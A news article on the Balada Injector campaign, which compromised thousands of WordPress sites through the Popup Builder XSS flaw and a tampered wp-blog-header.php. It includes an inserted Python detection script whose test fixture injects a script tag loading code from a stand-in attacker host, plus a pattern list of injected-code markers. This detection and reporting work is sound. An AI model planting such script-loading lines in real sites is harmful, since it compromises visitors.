Over 6,700 WordPress websites fell victim to a sophisticated cyber campaign deploying the notorious Balada Injector malware. 

Initially brought to light by Dr. Web researchers, this concerted attack commenced in mid-December, targeting vulnerabilities in WordPress themes and add-ons. 

Shockingly, it was unveiled that Balada Injector had been executing a colossal operation since 2017, compromising over 17,000 WordPress sites.


Over 6,700 WordPress Sites Spotted Using Plugin Infected by New Balada Injector Malware
A malicious version of the Popup Builder plugin is seen to be associated with the new Balada Injector, affecting more than 6,700 WordPress websites.

According to a report by Bleeping Computer, the attackers strategically implant a backdoor into compromised sites, redirecting visitors to fraudulent support pages, lottery schemes, and push notification scams.


Recent Surge in Attacks

The latest campaign emerged on December 13, 2023, just days after the disclosure of CVE-2023-6000, a cross-site scripting (XSS) vulnerability affecting Popup Builder versions 4.2.3 and older. 

Popup Builder, employed on 200,000 sites for crafting custom popups, became the focal point for exploitation.

Sucuri, a leading website security company, observed that Balada Injector had rapidly integrated an exploit for the reported flaw into its campaign. 

According to cybersecurity researchers, the attackers abused the "sgpbWillOpen" event in Popup Builder, storing malicious JavaScript code in the site's database so that it executes whenever the popup opens.

Beyond exploiting Popup Builder, the threat actors resorted to a secondary infection method. They tampered with the wp-blog-header.php file, injecting the same JavaScript backdoor into the compromised sites.
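The wp-blog-header.php tampering described above is straightforward to check for, because that file is tiny and never contains output or dynamic code in a clean install. The following added example (not code from the article, Sucuri or WordPress) compares a site's copy against a known-good baseline and flags injected statements; the baseline and the tampered sample here are constructed stand-ins, and in practice the administrator would use the exact file from a clean WordPress download of the same version.

```python
import re

# Constructed stand-in for a stock wp-blog-header.php (assumption: the admin
# replaces this with the exact file from a clean WordPress release).
CLEAN_HEADER = """<?php
/**
 * Loads the WordPress environment and template.
 */
if ( ! isset( $wp_did_header ) ) {
    $wp_did_header = true;
    // Load the WordPress library.
    require_once __DIR__ . '/wp-load.php';
    wp();
    require_once ABSPATH . WPINC . '/template-loader.php';
}
"""

# Constructed example of the tampering the article describes: the same file
# now emits a script tag on every page load (placeholder domain, not an IoC).
TAMPERED_HEADER = CLEAN_HEADER.replace(
    "    wp();\n",
    "    wp();\n    echo '<script src=\"https://attacker.example/x.js\"></script>';\n",
)

# Constructs a clean bootstrap file never contains.
SUSPICIOUS = re.compile(
    r"<script|eval\s*\(|base64_decode\s*\(|file_put_contents\s*\(|curl_exec\s*\(",
    re.IGNORECASE,
)

def _statements(src: str) -> list[str]:
    """Drop comments and blank lines, collapse whitespace, return code lines."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)       # block comments
    lines = []
    for line in src.splitlines():
        line = re.sub(r"^\s*(//|#).*$", "", line).strip()  # whole-line comments
        if line:
            lines.append(re.sub(r"\s+", " ", line))
    return lines

def injected_lines(actual: str, baseline: str) -> list[str]:
    """Return statements present in `actual` that the baseline does not have."""
    known = set(_statements(baseline))
    return [ln for ln in _statements(actual) if ln not in known]

def flag_suspicious(lines: list[str]) -> list[str]:
    """Return the injected lines that carry a marker of injected output or code."""
    return [ln for ln in lines if SUSPICIOUS.search(ln)]

if __name__ == "__main__":
    for ln in flag_suspicious(injected_lines(TAMPERED_HEADER, CLEAN_HEADER)):
        print("injected:", ln)
```

Any line reported by `injected_lines` deserves a look even if `flag_suspicious` is silent, since a clean bootstrap file has no legitimate reason to differ from the release copy.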

Stealthy Backdoor Operations

The "felody" backdoor, a key component of the Balada Injector arsenal, is a capable implant: it can execute arbitrary PHP code, upload files, communicate with the attackers, and fetch additional payloads.

As of now, the Balada Injector campaign has ensnared 6,700 websites. Sucuri's analysis of the attack domains points to a deliberate effort to hide the attackers' origins, including placing the domains behind Cloudflare.

Defending against Balada Injector mandates immediate actions from WordPress site administrators. Updating themes and plugins to the latest versions, uninstalling redundant or unsupported products, and minimizing active plugins on the site all contribute to fortifying the defenses against automated breaches. 

Nobody wants to find malware on their WordPress site, and the most effective habit to avoid it is to update plugins regularly.

What happened in 2022 should be reason enough for every WordPress user to secure their website. At that time, millions of sensitive records were leaked through a vulnerability discovered in UpdraftPlus, a WordPress cloning plugin.

Experts blamed UpdraftPlus's poor implementation, which left the data easy to access. That is why the flaw spread so quickly, putting millions of WordPress users at serious risk.

Again, there is no harm in updating your WP plugins. It might take a few minutes, but it buys peace of mind that your website is safe from unwanted attacks by outsiders and threat actors.



Joseph Henry

ⓒ 2024 TECHTIMES.com All rights reserved. Do not reproduce without permission.